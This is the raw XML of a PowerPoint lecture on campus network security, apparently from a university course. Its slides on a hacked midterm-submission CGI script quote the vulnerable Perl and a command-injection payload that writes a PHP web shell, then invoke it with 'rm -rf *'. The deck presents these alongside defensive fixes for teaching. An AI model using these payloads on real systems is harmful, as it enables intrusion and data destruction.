        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thanks for being helpful, responsive, and considerate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Really IP address/DNS can be used so long as the servers are behind the firewall?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Please give the faculty members as much freedom as possible; After all, enrich learning experience is our mission.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security incidents are unavoidable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>misconfigurations on new switches/routers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compromised machines in dormitory/labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="46355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I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mplement fast incident response; frequent monitoring/alerting/warning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80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 Midterm for Fun and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2492990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mike </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Gerscheske</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, a student in our MEIA program asked to hack my web application for submitting the midterm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>I approved and he succeeded! (add a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> script for executing any command on the sever)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>He wrote a paper/presentation on this effort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009900"/>
            <a:ext cx="7696200" cy="71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8960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Wrong with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>idterm.cgi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925513"/>
            <a:ext cx="8410575" cy="608474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# Author: C. Edward Chow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# Date:   22 December </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1995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…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>examine = $answers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{‘examine'}; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>examine is a hidden tag in web form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$class=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>($examine, 0, 5);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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mkdir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"$class\/$examine" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e "$class\/$examine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>";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$command="/bin/mail -s \'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$examine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>from " . $login . "\' -c $login\@cs.uccs.edu chow\@cs.uccs.edu &lt; $class\/$examine\/$filename";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99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system("$command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");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Hackers can substitute the hidden  class tag with </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>“CS502M2008 &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exec(\$_GET['command']); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Then run “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>http://cs.uccs.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>chow/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>-bin/grade/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>a.php?command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r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CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the name of vulnerability?  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCFF99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33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This Web App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874713"/>
            <a:ext cx="8410575" cy="7238905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static Code Analysis Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>e.g.RATS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Rough Auditing Tool for Security, Fortify/HP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>proper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input Validation Check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hidden tag is not hidden from hackers!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not make assumption that the return form data are from your own web page. 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They can be launched from a script run by a hacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need to be diligent in revising old web apps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Application Security Consortium statistics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>13% sites can be compromised automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>49% web apps with high risk level;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52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MediaWiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as Education/Coordination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2677656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Share resources or useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in classes and project web sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Coordinate big research proposals, e.g. Secure Smart Grids, in conjunction with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> group and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gotomeeting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Coordinate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cyber war competitions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66" y="2867095"/>
            <a:ext cx="1266667" cy="112381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085858"/>
            <a:ext cx="8328724" cy="209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5827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757130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hijacked  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTFwiki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6297108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UCCS system admin reported heavy traffic from athena.uccs.edu to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and certain sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> logs revealed accesses of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>456.php file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>r57shell.php) hidden in the data directory of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mediawiki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iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> competition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> search engine for a real-estate agent site and a drug store.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was two versions old, not patched.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Excuses: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> did not provide easy patch and porting to  new version takes quite  a lot of steps. Each wiki site has its own directory mingled with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code.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Summit 8/12/2011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Edward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3ED4-55E6-486A-B9BC-29A44110F5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082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9/14/2005 4:58:15 PM&quot;&gt;&lt;Slide id=&quot;257&quot; dur=&quot;138.453&quot;/&gt;&lt;Slide id=&quot;307&quot; dur=&quot;22.094&quot;/&gt;&lt;Slide id=&quot;436&quot; dur=&quot;39.266&quot;/&gt;&lt;Slide id=&quot;438&quot; dur=&quot;15.156&quot;/&gt;&lt;Slide id=&quot;437&quot; dur=&quot;66.547&quot;/&gt;&lt;Slide id=&quot;441&quot; dur=&quot;144.687&quot;/&gt;&lt;Slide id=&quot;442&quot; dur=&quot;91.703&quot;/&gt;&lt;Slide id=&quot;443&quot; dur=&quot;100.969&quot;/&gt;&lt;Slide id=&quot;445&quot; dur=&quot;66.688&quot;/&gt;&lt;Slide id=&quot;465&quot; dur=&quot;1422.906&quot; bld=&quot;|1&quot;/&gt;&lt;Slide id=&quot;479&quot; dur=&quot;93.734&quot;/&gt;&lt;Slide id=&quot;480&quot; dur=&quot;45.938&quot;/&gt;&lt;Slide id=&quot;482&quot; dur=&quot;49.531&quot;/&gt;&lt;Slide id=&quot;483&quot; dur=&quot;46&quot;/&gt;&lt;Slide id=&quot;484&quot; dur=&quot;64.891&quot;/&gt;&lt;Slide id=&quot;481&quot; dur=&quot;51.906&quot;/&gt;&lt;Slide id=&quot;485&quot; dur=&quot;118.469&quot; bld=&quot;|114.8&quot;/&gt;&lt;Slide id=&quot;486&quot; dur=&quot;35.937&quot;/&gt;&lt;Slide id=&quot;487&quot; dur=&quot;72.266&quot; bld=&quot;|44.8&quot;/&gt;&lt;Slide id=&quot;488&quot; dur=&quot;25.672&quot; bld=&quot;|7.6|.5|.5|.5|4.8&quot;/&gt;&lt;Slide id=&quot;489&quot; dur=&quot;25.609&quot; bld=&quot;|7.1|2|7.8|2&quot;/&gt;&lt;Slide id=&quot;516&quot; dur=&quot;10.453&quot;/&gt;&lt;Slide id=&quot;490&quot; dur=&quot;118.422&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;491&quot; dur=&quot;35.25&quot;/&gt;&lt;Slide id=&quot;492&quot; dur=&quot;22.281&quot;/&gt;&lt;Slide id=&quot;493&quot; dur=&quot;24.094&quot;/&gt;&lt;Slide id=&quot;494&quot; dur=&quot;12.75&quot;/&gt;&lt;Slide id=&quot;495&quot; dur=&quot;10.531&quot;/&gt;&lt;Slide id=&quot;496&quot; dur=&quot;30.438&quot;/&gt;&lt;Slide id=&quot;497&quot; dur=&quot;20.828&quot; bld=&quot;|9.4|2.1|5.4&quot;/&gt;&lt;Slide id=&quot;498&quot; dur=&quot;14.484&quot; bld=&quot;|.7|1|2.1|5.1&quot;/&gt;&lt;Slide id=&quot;499&quot; dur=&quot;15.875&quot; bld=&quot;|5.9|3.1&quot;/&gt;&lt;Slide id=&quot;501&quot; dur=&quot;5.266&quot;/&gt;&lt;Slide id=&quot;502&quot; dur=&quot;.797&quot;/&gt;&lt;Slide id=&quot;501&quot; dur=&quot;54.375&quot;/&gt;&lt;Slide id=&quot;502&quot; dur=&quot;59.125&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;503&quot; dur=&quot;63.125&quot;/&gt;&lt;Slide id=&quot;504&quot; dur=&quot;40.031&quot;/&gt;&lt;Slide id=&quot;505&quot; dur=&quot;30.297&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;517&quot; dur=&quot;60.953&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;506&quot; dur=&quot;52.125&quot;/&gt;&lt;Slide id=&quot;507&quot; dur=&quot;113.656&quot;/&gt;&lt;Slide id=&quot;508&quot; dur=&quot;23.266&quot; bld=&quot;|0|0|0|0&quot;/&gt;&lt;Slide id=&quot;509&quot; dur=&quot;59.203&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;510&quot; dur=&quot;25.109&quot; bld=&quot;|8.6|0|2|.5|6|.5|.5|.5|.5|.5&quot;/&gt;&lt;Slide id=&quot;511&quot; dur=&quot;2.594&quot;/&gt;&lt;Slide id=&quot;510&quot; dur=&quot;26.469&quot;/&gt;&lt;Slide id=&quot;511&quot; dur=&quot;44.656&quot; bld=&quot;|5.8|5.2|.5|.5|4.1|.5|11.1&quot;/&gt;&lt;Slide id=&quot;513&quot; dur=&quot;170.953&quot;/&gt;&lt;Slide id=&quot;512&quot; dur=&quot;2.172&quot; bld=&quot;|.5&quot;/&gt;&lt;Slide id=&quot;514&quot; dur=&quot;100.922&quot;/&gt;&lt;Slide id=&quot;515&quot; dur=&quot;1.609&quot;/&gt;&lt;/Timings&gt;&lt;/WMTools&gt;"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="PDC_Template_2005">
  <a:themeElements>
    <a:clrScheme name="PDC_Template_2005 4">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="18536E"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFB601"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="F7E993"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B2BB1D"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="ABB3BA"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="DADADA"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FAF2C8"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A1A919"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="66FFFF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="B51A8A"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="PDC_Template_2005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63529"/>
                <a:invGamma/>
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:gamma/>
                <a:shade val="63529"/>
                <a:invGamma/>
                <a:alpha val="70000"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63529"/>
                <a:invGamma/>
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:gamma/>
                <a:shade val="63529"/>
                <a:invGamma/>
                <a:alpha val="70000"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</a:lnDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst>
    <a:extraClrScheme>
      <a:clrScheme name="PDC_Template_2005 1">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="194489"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFB601"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="F7E993"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="B2BB1D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="ABB0C4"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FAF2C8"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="A1A919"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="0078FA"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="B51A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C_Template_2005 2">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="176B6F"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFB601"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="F7E993"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="B2BB1D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="ABBABB"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FAF2C8"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="A1A919"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="0078FA"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="B51A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C_Template_2005 3">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="18536E"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFB601"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="F7E993"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="B2BB1D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="ABB3BA"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FAF2C8"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="A1A919"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="0078FA"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="B51A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C_Template_2005 4">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="18536E"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFB601"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="F7E993"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="B2BB1D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="ABB3BA"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FAF2C8"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="A1A919"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="66FFFF"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="B51A8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21274</TotalTime>
  <Words>1757</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>271</Paragraphs>
  <Slides>24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PDC_Template_2005</vt:lpstr>
      <vt:lpstr>Photo Editor Photo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Outline of the Talk</vt:lpstr>
      <vt:lpstr>Reality in Academic Playground</vt:lpstr>
      <vt:lpstr>Enforcing Security in Academic Playground</vt:lpstr>
      <vt:lpstr>Hacking Midterm for Fun and Grade</vt:lpstr>
      <vt:lpstr>What are Wrong with Midterm.cgi?</vt:lpstr>
      <vt:lpstr>How to Fix This Web App Vulnerability</vt:lpstr>
      <vt:lpstr>MediaWiki as Education/Coordination Tool</vt:lpstr>
      <vt:lpstr>Hijacked  iCTFwiki</vt:lpstr>
      <vt:lpstr>Prevent Mediawiki or PHP Hacks</vt:lpstr>
      <vt:lpstr>SSL Security Breach while online final is on </vt:lpstr>
      <vt:lpstr>UCCSClassApp: Towards A better CMS for iPad Client and Smart Mobile Devices</vt:lpstr>
      <vt:lpstr>An analysis of the iKee.B (duh) </vt:lpstr>
      <vt:lpstr>Installation Logic of iKee.B (duh)</vt:lpstr>
      <vt:lpstr>Cloud Computing: Public vs. Private</vt:lpstr>
      <vt:lpstr>Security Issues in Cloud Computing</vt:lpstr>
      <vt:lpstr>Dealing with Amazon Virtual Private Cloud</vt:lpstr>
      <vt:lpstr>New Initiatives in Supporting Integrated Cloud Computing</vt:lpstr>
